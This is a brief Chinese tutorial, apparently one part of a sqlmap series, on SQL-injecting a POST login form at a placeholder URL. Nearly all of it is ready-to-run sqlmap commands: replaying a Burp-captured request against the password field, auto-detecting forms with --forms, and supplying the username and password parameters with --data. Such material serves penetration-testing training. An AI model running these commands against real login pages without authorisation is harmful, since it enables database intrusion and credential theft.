4.Sqlmap系列教程——post登录框注入
注入点:
http://xxx.xxx.com/Login.asp
注入方式一:
1.对着注入点使用burp抓包,保存txt格式文件。
2.输入命令:
./sqlmap.py -r search-test.txt -p tfUPass
注入方式二:自动搜索表单的方式
sqlmap -u http://xxx.xxx.com/Login.asp --forms
注入方式三:指定一个参数的方法
sqlmap -u http://xxx.xxx.com/Login.asp --data "tfUName=1&tfUPass=1"